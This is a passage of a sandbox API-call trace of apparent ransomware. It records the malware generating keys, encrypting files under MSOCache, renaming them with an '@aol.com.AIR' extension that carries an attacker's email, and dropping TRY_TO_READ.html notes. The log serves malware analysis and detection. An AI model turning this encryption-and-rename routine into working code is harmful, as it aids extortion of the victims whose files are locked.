	[0084.146] SetFilePointer (in: hFile=0x48c, lDistanceToMove=-519584, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0084.146] WriteFile (in: hFile=0x48c, lpBuffer=0x3a20048*, nNumberOfBytesToWrite=0x7eda0, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a20048*, lpNumberOfBytesWritten=0x3a1f778*=0x7eda0, lpOverlapped=0x0) returned 1
	[0084.147] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x3790048 | out: hHeap=0x540000) returned 1
	[0084.151] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x3a20048 | out: hHeap=0x540000) returned 1
	[0084.156] CloseHandle (hObject=0x48c) returned 1
	[0084.159] GetProcessHeap () returned 0x540000
	[0084.159] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0084.159] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0084.159] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0084.159] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fbb90 | out: hHeap=0x540000) returned 1
	[0084.159] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fb618 | out: hHeap=0x540000) returned 1
	[0084.159] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa0) returned 0x5fbb90
	[0084.159] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0084.159] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0084.159] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0084.159] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0084.159] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll", dwFileAttributes=0x80) returned 1
	[0084.160] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 75
	[0084.160] GetProcessHeap () returned 0x540000
	[0084.160] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xfc) returned 0x5b8568
	[0084.160] lstrcpyW (in: lpString1=0x5b8568, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll"
	[0084.160] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll.12781717671972518758.ex_parvis@aol.com.AIR"
	[0084.160] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwdcw20.dll"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwdcw20.dll.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0084.162] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwdcw20.dll.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x48c
	[0084.162] GetProcessHeap () returned 0x540000
	[0084.162] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0084.162] GetFileSizeEx (in: hFile=0x48c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=526176) returned 1
	[0084.162] SetFilePointer (in: hFile=0x48c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x80760
	[0084.162] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0084.162] GetProcessHeap () returned 0x540000
	[0084.162] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0084.162] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0084.162] WriteFile (in: hFile=0x48c, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0084.164] WriteFile (in: hFile=0x48c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0084.164] WriteFile (in: hFile=0x48c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0084.164] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80760) returned 0x23e0020
	[0084.164] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80760) returned 0x2a90020
	[0084.164] SetFilePointer (in: hFile=0x48c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0084.165] ReadFile (in: hFile=0x48c, lpBuffer=0x23e0020, nNumberOfBytesToRead=0x80760, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x23e0020*, lpNumberOfBytesRead=0x3a1f778*=0x80760, lpOverlapped=0x0) returned 1
	[0084.189] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0084.189] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0084.189] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE", dwFileAttributes=0x80) returned 1
	[0084.189] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 72
	[0084.189] GetProcessHeap () returned 0x540000
	[0084.189] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xf6) returned 0x5fb570
	[0084.189] lstrcpyW (in: lpString1=0x5fb570, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE"
	[0084.189] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE.12781717671972518758.ex_parvis@aol.com.AIR"
	[0084.189] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dw20.exe"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dw20.exe.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0084.192] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dw20.exe.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x48c
	[0084.192] GetProcessHeap () returned 0x540000
	[0084.192] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fb570 | out: hHeap=0x540000) returned 1
	[0084.192] GetFileSizeEx (in: hFile=0x48c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=838536) returned 1
	[0084.192] SetFilePointer (in: hFile=0x48c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xccb88
	[0084.192] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0084.192] GetProcessHeap () returned 0x540000
	[0084.192] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0084.192] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0084.192] WriteFile (in: hFile=0x48c, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0084.194] WriteFile (in: hFile=0x48c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0084.194] WriteFile (in: hFile=0x48c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0084.194] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xccb88) returned 0x3010020
	[0084.194] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xccb88) returned 0x3c20020
	[0084.194] SetFilePointer (in: hFile=0x48c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0084.194] ReadFile (in: hFile=0x48c, lpBuffer=0x3010020, nNumberOfBytesToRead=0xccb88, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3010020*, lpNumberOfBytesRead=0x3a1f778*=0xccb88, lpOverlapped=0x0) returned 1
	[0084.234] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0084.234] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0084.234] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", dwFileAttributes=0x80) returned 1
	[0084.235] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 76
	[0084.235] GetProcessHeap () returned 0x540000
	[0084.235] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xfe) returned 0x5b8568
	[0084.235] lstrcpyW (in: lpString1=0x5b8568, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml"
	[0084.235] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.12781717671972518758.ex_parvis@aol.com.AIR"
	[0084.235] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0084.237] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x48c
	[0084.237] GetProcessHeap () returned 0x540000
	[0084.237] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0084.237] GetFileSizeEx (in: hFile=0x48c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=596341) returned 1
	[0084.237] SetFilePointer (in: hFile=0x48c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x91975
	[0084.237] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0084.237] GetProcessHeap () returned 0x540000
	[0084.237] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0084.237] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0084.237] WriteFile (in: hFile=0x48c, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0084.239] WriteFile (in: hFile=0x48c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0084.239] WriteFile (in: hFile=0x48c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0084.239] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x91975) returned 0x2a90020
	[0084.239] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x91975) returned 0x3010020
	[0084.239] SetFilePointer (in: hFile=0x48c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0084.239] ReadFile (in: hFile=0x48c, lpBuffer=0x2a90020, nNumberOfBytesToRead=0x91975, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x2a90020*, lpNumberOfBytesRead=0x3a1f778*=0x91975, lpOverlapped=0x0) returned 1
	[0084.265] FindFirstFileW (in: lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfa13c510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc9eeba90, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9eeba90, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da370
	[0084.265] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0084.265] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0084.265] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x5894d0
	[0084.265] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0084.265] GetLastError () returned 0x0
	[0084.265] FindNextFileW (in: hFindFile=0x5da370, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfa13c510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc9eeba90, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9eeba90, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0084.265] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0084.265] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0084.265] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x5894d0
	[0084.265] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0084.265] GetLastError () returned 0x0
	[0084.265] FindNextFileW (in: hFindFile=0x5da370, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa2b92d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc0c6890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc0c6890, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Access.en-us", cAlternateFileName="ACCESS~1.EN-")) returned 1
	[0084.265] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0084.265] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0084.265] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x5894d0
	[0084.265] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0084.266] GetLastError () returned 0x0
	[0084.266] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\TRY_TO_READ.html" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x490
	[0084.268] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fb580 | out: hHeap=0x540000) returned 1
	[0084.268] WriteFile (in: hFile=0x490, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0084.269] WriteFile (in: hFile=0x490, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0084.269] WriteFile (in: hFile=0x490, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0084.269] CloseHandle (hObject=0x490) returned 1
	[0084.269] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fb4b8 | out: hHeap=0x540000) returned 1
	[0084.269] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967d0 | out: hHeap=0x540000) returned 1
	[0084.269] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0084.269] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fbc38 | out: hHeap=0x540000) returned 1
	[0084.269] FindNextFileW (in: hFindFile=0x5da370, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3f33d800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3f33d800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa160f00, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd4200, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AccessMUISet.msi", cAlternateFileName="ACCESS~1.MSI")) returned 1
	[0084.269] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0084.269] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0084.270] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x5894d0
	[0084.270] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0084.270] GetLastError () returned 0x0
	[0084.270] FindNextFileW (in: hFindFile=0x5da370, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x333, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AccessMUISet.xml", cAlternateFileName="ACCESS~1.XML")) returned 1
	[0084.270] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0084.270] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0084.270] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x5894d0
	[0084.270] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0084.270] GetLastError () returned 0x0
	[0084.270] FindNextFileW (in: hFindFile=0x5da370, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc111bb0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xa40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1
	[0084.270] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0084.270] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0084.270] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x5894d0
	[0084.270] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0084.270] GetLastError () returned 0x0
	[0084.270] FindNextFileW (in: hFindFile=0x5da370, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc9eeba90, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9eeba90, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9eeba90, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0084.270] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0084.270] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0084.270] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x5894d0
	[0084.270] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0084.270] GetLastError () returned 0x0
